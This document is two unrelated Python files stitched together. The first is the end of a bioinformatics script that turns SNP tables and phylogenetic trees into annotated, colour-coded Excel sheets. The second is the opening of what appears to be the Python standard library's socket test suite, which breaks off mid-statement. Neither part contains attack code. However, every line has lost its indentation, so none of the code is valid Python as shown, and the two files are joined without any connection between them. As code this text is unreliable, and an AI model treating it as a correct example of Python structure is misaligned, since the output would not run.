# cascade and sort tables are built using the file,
# and it is opened for writing in append mode.
os.remove(annotation_file)
# Process the data.
table_df_transposed = table_df.T
table_df_transposed.index = table_df_transposed.index.rename('index')
table_df_transposed = table_df_transposed.merge(annotations_df, left_index=True, right_index=True)
table_df = table_df_transposed.T
return table_df
def excel_formatter(json_file_name, excel_file_name, group, annotation_dict):
pandas.io.formats.excel.header_style = None
table_df = pandas.read_json(json_file_name, orient='split')
if annotation_dict is not None:
table_df = annotate_table(table_df, group, annotation_dict)
else:
table_df = table_df.append(pandas.Series(name='no annotations'))
writer = pandas.ExcelWriter(excel_file_name, engine='xlsxwriter')
table_df.to_excel(writer, sheet_name='Sheet1')
writer_book = writer.book
ws = writer.sheets['Sheet1']
format_a = writer_book.add_format({'bg_color': '#58FA82'})
format_g = writer_book.add_format({'bg_color': '#F7FE2E'})
format_c = writer_book.add_format({'bg_color': '#0000FF'})
format_t = writer_book.add_format({'bg_color': '#FF0000'})
format_normal = writer_book.add_format({'bg_color': '#FDFEFE'})
formatlowqual = writer_book.add_format({'font_color': '#C70039', 'bg_color': '#E2CFDD'})
format_ambigous = writer_book.add_format({'font_color': '#C70039', 'bg_color': '#E2CFDD'})
format_n = writer_book.add_format({'bg_color': '#E2CFDD'})
rows, cols = table_df.shape
ws.set_column(0, 0, 30)
ws.set_column(1, cols, 2.1)
ws.freeze_panes(2, 1)
format_annotation = writer_book.add_format({'font_color': '#0A028C', 'rotation': '-90', 'align': 'top'})
# Set last row.
ws.set_row(rows + 1, cols + 1, format_annotation)
# Make sure that row/column locations don't overlap.
ws.conditional_format(rows - 2, 1, rows - 1, cols, {'type': 'cell', 'criteria': '<', 'value': 55, 'format': formatlowqual})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'cell', 'criteria': '==', 'value': 'B$2', 'format': format_normal})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'A', 'format': format_a})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'G', 'format': format_g})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'C', 'format': format_c})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'T', 'format': format_t})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'S', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'Y', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'R', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'W', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'K', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'M', 'format': format_ambigous})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': 'N', 'format': format_n})
ws.conditional_format(2, 1, rows - 2, cols, {'type': 'text', 'criteria': 'containing', 'value': '-', 'format': format_n})
format_rotation = writer_book.add_format({})
format_rotation.set_rotation(90)
for column_num, column_name in enumerate(list(table_df.columns)):
ws.write(0, column_num + 1, column_name, format_rotation)
format_annotation = writer_book.add_format({'font_color': '#0A028C', 'rotation': '-90', 'align': 'top'})
# Set last row.
ws.set_row(rows, 400, format_annotation)
writer.save()
def get_annotation_dict(gbk_file):
gbk_dict = SeqIO.to_dict(SeqIO.parse(gbk_file, "genbank"))
annotation_dict = {}
tmp_file = "features.csv"
# Create a file of chromosomes and features.
for chromosome in list(gbk_dict.keys()):
with open(tmp_file, 'w+') as fh:
for feature in gbk_dict[chromosome].features:
if "CDS" in feature.type or "rRNA" in feature.type:
try:
product = feature.qualifiers['product'][0]
except KeyError:
product = None
try:
locus = feature.qualifiers['locus_tag'][0]
except KeyError:
locus = None
try:
gene = feature.qualifiers['gene'][0]
except KeyError:
gene = None
fh.write("%s\t%d\t%d\t%s\t%s\t%s\n" % (chromosome, int(feature.location.start), int(feature.location.end), locus, product, gene))
# Read the chromosomes and features file into a data frame.
df = pandas.read_csv(tmp_file, sep='\t', names=["chrom", "start", "stop", "locus", "product", "gene"])
# Process the data.
df = df.sort_values(['start', 'gene'], ascending=[True, False])
df = df.drop_duplicates('start')
pro = df.reset_index(drop=True)
pro.index = pandas.IntervalIndex.from_arrays(pro['start'], pro['stop'], closed='both')
annotation_dict[chromosome] = pro
return annotation_dict
def get_sample_name(file_path):
base_file_name = os.path.basename(file_path)
if base_file_name.find(".") > 0:
# Eliminate the extension.
return os.path.splitext(base_file_name)[0]
return base_file_name
def output_cascade_table(cascade_order, mqdf, group, annotation_dict):
cascade_order_mq = pandas.concat([cascade_order, mqdf], join='inner')
output_table(cascade_order_mq, "cascade", group, annotation_dict)
def output_excel(df, type_str, group, annotation_dict, count=None):
# Output the temporary json file that
# is used by the excel_formatter.
if count is None:
if group is None:
json_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_order_mq.json" % type_str)
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_table.xlsx" % type_str)
else:
json_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_%s_order_mq.json" % (group, type_str))
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_%s_table.xlsx" % (group, type_str))
else:
# The table has more columns than is allowed by the
# MAXCOLS setting, so multiple files will be produced
# as an output collection.
if group is None:
json_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_order_mq_%d.json" % (type_str, count))
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_table_%d.xlsx" % (type_str, count))
else:
json_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_%s_order_mq_%d.json" % (group, type_str, count))
excel_file_name = os.path.join(OUTPUT_EXCEL_DIR, "%s_%s_table_%d.xlsx" % (group, type_str, count))
df.to_json(json_file_name, orient='split')
# Output the Excel file.
excel_formatter(json_file_name, excel_file_name, group, annotation_dict)
def output_sort_table(cascade_order, mqdf, group, annotation_dict):
sort_df = cascade_order.T
sort_df['abs_value'] = sort_df.index
sort_df[['chrom', 'pos']] = sort_df['abs_value'].str.split(':', expand=True)
sort_df = sort_df.drop(['abs_value', 'chrom'], axis=1)
sort_df.pos = sort_df.pos.astype(int)
sort_df = sort_df.sort_values(by=['pos'])
sort_df = sort_df.drop(['pos'], axis=1)
sort_df = sort_df.T
sort_order_mq = pandas.concat([sort_df, mqdf], join='inner')
output_table(sort_order_mq, "sort", group, annotation_dict)
def output_table(df, type_str, group, annotation_dict):
if isinstance(group, str) and group.startswith("dataset"):
# Inputs are single files, not collections,
# so input file names are not useful for naming
# output files.
group_str = None
else:
group_str = group
count = 0
chunk_start = 0
chunk_end = 0
column_count = df.shape[1]
if column_count >= MAXCOLS:
# Here the number of columns is greater than
# the maximum allowed by Excel, so multiple
# outputs will be produced.
while column_count >= MAXCOLS:
count += 1
chunk_end += MAXCOLS
df_of_type = df.iloc[:, chunk_start:chunk_end]
output_excel(df_of_type, type_str, group_str, annotation_dict, count=count)
chunk_start += MAXCOLS
column_count -= MAXCOLS
count += 1
df_of_type = df.iloc[:, chunk_start:]
output_excel(df_of_type, type_str, group_str, annotation_dict, count=count)
else:
output_excel(df, type_str, group_str, annotation_dict)
def preprocess_tables(task_queue, annotation_dict, timeout):
while True:
try:
tup = task_queue.get(block=True, timeout=timeout)
except queue.Empty:
break
newick_file, json_file, json_avg_mq_file = tup
avg_mq_series = pandas.read_json(json_avg_mq_file, typ='series', orient='split')
# Map quality to dataframe.
mqdf = avg_mq_series.to_frame(name='MQ')
mqdf = mqdf.T
# Get the group.
group = get_sample_name(newick_file)
snps_df = pandas.read_json(json_file, orient='split')
with open(newick_file, 'r') as fh:
for line in fh:
line = re.sub('[:,]', '\n', line)
line = re.sub('[)(]', '', line)
line = re.sub(r'[0-9].*\.[0-9].*\n', '', line)
line = re.sub('root\n', '', line)
sample_order = line.split('\n')
sample_order = list([_f for _f in sample_order if _f])
sample_order.insert(0, 'root')
tree_order = snps_df.loc[sample_order]
# Count number of SNPs in each column.
snp_per_column = []
for column_header in tree_order:
count = 0
column = tree_order[column_header]
for element in column:
if element != column[0]:
count = count + 1
snp_per_column.append(count)
row1 = pandas.Series(snp_per_column, tree_order.columns, name="snp_per_column")
# Count number of SNPS from the
# top of each column in the table.
snp_from_top = []
for column_header in tree_order:
count = 0
column = tree_order[column_header]
# for each element in the column
# skip the first element
for element in column[1:]:
if element == column[0]:
count = count + 1
else:
break
snp_from_top.append(count)
row2 = pandas.Series(snp_from_top, tree_order.columns, name="snp_from_top")
tree_order = tree_order.append([row1])
tree_order = tree_order.append([row2])
# In pandas=0.18.1 even this does not work:
# abc = row1.to_frame()
# abc = abc.T --> tree_order.shape (5, 18), abc.shape (1, 18)
# tree_order.append(abc)
# Continue to get error: "*** ValueError: all the input arrays must have same number of dimensions"
tree_order = tree_order.T
tree_order = tree_order.sort_values(['snp_from_top', 'snp_per_column'], ascending=[True, False])
tree_order = tree_order.T
# Remove snp_per_column and snp_from_top rows.
cascade_order = tree_order[:-2]
# Output the cascade table.
output_cascade_table(cascade_order, mqdf, group, annotation_dict)
# Output the sorted table.
output_sort_table(cascade_order, mqdf, group, annotation_dict)
task_queue.task_done()
def set_num_cpus(num_files, processes):
num_cpus = int(multiprocessing.cpu_count())
if num_files < num_cpus and num_files < processes:
return num_files
if num_cpus < processes:
half_cpus = int(num_cpus / 2)
if num_files < half_cpus:
return num_files
return half_cpus
return processes
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--input_avg_mq_json', action='store', dest='input_avg_mq_json', required=False, default=None, help='Average MQ json file')
parser.add_argument('--input_newick', action='store', dest='input_newick', required=False, default=None, help='Newick file')
parser.add_argument('--input_snps_json', action='store', dest='input_snps_json', required=False, default=None, help='SNPs json file')
parser.add_argument('--gbk_file', action='store', dest='gbk_file', required=False, default=None, help='Optional gbk file'),
parser.add_argument('--processes', action='store', dest='processes', type=int, help='User-selected number of processes to use for job splitting')
args = parser.parse_args()
if args.gbk_file is not None:
# Create the annotation_dict for annotating
# the Excel tables.
annotation_dict = get_annotation_dict(args.gbk_file)
else:
annotation_dict = None
# The assumption here is that the list of files
# in both INPUT_NEWICK_DIR and INPUT_JSON_DIR are
# named such that they are properly matched if
# the directories contain more than 1 file (i.e.,
# hopefully the newick file names and json file names
# will be something like Mbovis-01D6_* so they can be
# sorted and properly associated with each other).
if args.input_newick is not None:
newick_files = [args.input_newick]
else:
newick_files = []
for file_name in sorted(os.listdir(INPUT_NEWICK_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_NEWICK_DIR, file_name))
newick_files.append(file_path)
if args.input_snps_json is not None:
json_files = [args.input_snps_json]
else:
json_files = []
for file_name in sorted(os.listdir(INPUT_JSON_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_JSON_DIR, file_name))
json_files.append(file_path)
if args.input_avg_mq_json is not None:
json_avg_mq_files = [args.input_avg_mq_json]
else:
json_avg_mq_files = []
for file_name in sorted(os.listdir(INPUT_JSON_AVG_MQ_DIR)):
file_path = os.path.abspath(os.path.join(INPUT_JSON_AVG_MQ_DIR, file_name))
json_avg_mq_files.append(file_path)
multiprocessing.set_start_method('spawn')
queue1 = multiprocessing.JoinableQueue()
queue2 = multiprocessing.JoinableQueue()
num_files = len(newick_files)
cpus = set_num_cpus(num_files, args.processes)
# Set a timeout for get()s in the queue.
timeout = 0.05
for i, newick_file in enumerate(newick_files):
json_file = json_files[i]
json_avg_mq_file = json_avg_mq_files[i]
queue1.put((newick_file, json_file, json_avg_mq_file))
# Complete the preprocess_tables task.
processes = [multiprocessing.Process(target=preprocess_tables, args=(queue1, annotation_dict, timeout, )) for _ in range(cpus)]
for p in processes:
p.start()
for p in processes:
p.join()
queue1.join()
if queue1.empty():
queue1.close()
queue1.join_thread()
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
VSOCKPORT = 1234
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _is_fd_in_blocking_mode(sock):
return not bool(
fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
